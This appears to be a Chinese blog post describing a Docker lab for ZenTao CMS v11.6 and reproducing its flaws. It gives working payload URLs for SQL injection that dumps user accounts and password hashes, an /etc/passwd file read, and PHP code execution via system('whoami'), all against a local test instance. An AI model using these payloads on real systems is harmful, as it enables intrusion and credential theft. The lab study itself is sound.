禅道v11.6 基于linux环境下的docker容器搭建的靶场

月半小夜曲_

 关注

阅读 40

2023-12-06

一、环境搭建

linux环境下的

在docker环境下安装禅道CMS V11.6

docker run --name zentao_v11.6 -p 8084:80 -v /u01/zentao/www:/app/zentaopms -v /u01/zentao/data:/var/lib/mysql -e MYSQL_ROOT_PASSWORD=123456 -d docker.io/yunwisdom/zentao:v11.6

二、常见问题

1.删除Docker容器镜像报错(同样适用于,在Docker下搭建靶场无法启用的方法)
image.png
不能删除正在运行的容器,需要先停止进程
image.png
再查看时就看到此靶场的进程被删除了
image.png
重新安装
image.png
查看当前进程,现实容器启用
image.png

扩展:Docker下的搭建靶场无法启用其他可能方法
①重启kali,在开启容器

登录后台时密码错误(输入正确密码还是登陆失败)
①可能是8084端口没开
②http://172.0.0.1:8084/install.php(注意标红的位置,进行重新安装以下尝试)

image.png

三、漏洞复现

1.SQL注入

Payload

http://127.0.0.1/api-getModel-api-sql-sql=select+account,password+from+zt_user

Poc访问结果
image.png

2.任意文件读取

Payload

http://127.0.0.1/api-getModel-file-parseCSV-fileName=/etc/passwd

Poc访问结果
image.png

3.RCE

Payload1

http://127.0.0.1/api-getModel-api-getMethod-filePath=1111/1


fileContent=<?php phpinfo()?>

Poc访问结果
image.png
Payload2

http://127.0.0.1/api-getModel-api-getMethod-filePath=2222/2


fileContent=<?php system('whoami');?>

image.png

相关推荐

Linux环境搭建禅道

自由情感小屋 50 0 0

Linux26--测试环境搭建-禅道

水墨_青花 106 0 0

Linux下安装禅道

老王420 90 0 0

Docker 下 禅道(12.3.3) 安装

紫荆峰 170 0 0

Linux软件搭建->禅道源码搭建

老王420 79 0 0

Linux系统下禅道的安装以及配置教程

海牙秋天 85 0 0

禅道zentao镜像下的安装

Ewall_熊猫 57 0 0

基于 docker容器搭建机器学习环境

素锦时年_1b00 179 0 0

禅道的使用

青鸾惊鸿 252 0 0

Linux环境下Docker的安装

星河出山 77 0 0

精彩评论(0)

0 0 举报